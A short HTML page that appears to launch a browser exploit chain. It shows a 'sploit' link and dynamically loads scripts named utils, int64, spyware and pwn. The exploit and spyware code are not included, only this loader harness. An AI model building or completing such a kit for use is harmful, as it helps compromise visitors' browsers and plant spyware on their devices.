<!DOCTYPE html>
<html>
<title></title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
html, body
{
    width: 100%;
    height: 100%;
    margin: 0;
    padding: 0;
    display: flex;
    align-items: center;
    justify-content: center;
}
.lnk
{
    font-size: 10vh;
}
</style>
<body>
    <a href="javascript:go()" class="lnk">sploit</a>
    <script>
        (["utils", "int64", "spyware", "pwn"]).forEach(
            function(jsf) {
                var script = document.createElement('script');
                script.src = jsf + '.js?' + (new Date()).getTime();
                document.body.appendChild(script);
            })
    </script>
</body>
</html>
